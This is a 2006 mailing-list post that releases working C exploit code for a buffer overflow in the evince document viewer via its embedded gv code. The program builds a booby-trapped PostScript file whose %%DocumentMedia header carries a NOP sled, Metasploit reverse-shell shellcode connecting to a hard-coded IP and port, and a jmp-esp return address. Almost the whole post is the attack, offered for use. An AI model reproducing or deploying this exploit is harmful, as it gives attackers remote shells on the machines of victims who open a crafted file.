evince buffer overflow exploit (gv)

kspecial <kspecial@xxxxxxxxxxxxxxx> · Tue, 28 Nov 2006 00:11:48 -0500

hey team, seems evince is vuln through it's embedded use of gv to the same hole 
described in bid 20978. here is exploit code for evince. users using
epiphany web browser beware, this is click-a-link exploitation.

--K-sPecial
/*
 * Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)
 * Name: evince-ps-field-bof.c
 * Date: 11/27/2006
 * Version: 
 * 	1.00 - creation
 *
 * Other: this idea originaly came from the bid for the 'gv' buffer overflow (20978), i don't
 *  believe it's known until now that evince is also vulnerable. 
 *
 * Compile: gcc -o epfb evince-ps-field-bof.c -std=c99
*/
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <arpa/inet.h>

// insert shellcode here, i'm not going to implement ip/port changing since
// metasploit's shellcode generation engine does it just fine. i had a picky time
// with the shellcodes, there must be some bad bytes. this shellcode from 
// metasploit works but be SURE to set Encoder=None

/* linux_ia32_reverse -  LHOST=67.76.107.14 LPORT=5555 Size=70 Encoder=None http://metasploit.com */
char cb[] =
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59"
"\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\x43\x4c\x6b\x0e\x66\x68"
"\x15\xb3\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd"
"\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\x89\xe1\xb0\x0b\xcd\x80";

// location of "jmp *%esp"
char jmpesp[] = "\x77\xe7\xff\xff";

int main (int argc, char **argv) {
	FILE *fh;

	if (!(fh = fopen(*(argv+1), "w+b"))) { 
		printf("%s <file.ps>\n\n", *(argv));
		printf("[-] unable to open file '%s' for writing: %s\n", *(argv+1), strerror(errno));
		exit(1);
	}

	fputs("%!PS-Adobe-3.0\n", fh);
	fputs("%%Title: hello.ps\n", fh);
	fputs("%%For: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)\n", fh);
	fputs("%%BoundingBox: 24 24 588 768\n", fh);
	fputs("%%DocumentMedia: ", fh);
	for (int i = 0; i < 100; i++) 
		fputc(0x90, fh);

	fwrite(cb, strlen(cb), 1, fh);

	for (int i = strlen(cb) + 100; i < 273; i++) 
		fputc('A', fh);

	fwrite(jmpesp, 4, 1, fh);
	fwrite("\xe9\x02\xff\xff\xff", 5, 1, fh);

	fputc('\n', fh);

	fputs("%%DocumentData: Clean7Bit\n", fh);
	fputs("%%Orientation: Landscape\n", fh);
	fputs("%%Pages: 1\n", fh);
	fputs("%%PageOrder: Ascend\n", fh);
	fputs("%%+ encoding ISO-8859-1Encoding\n", fh);
	fputs("%%EndComments\n", fh);

	return(0);
}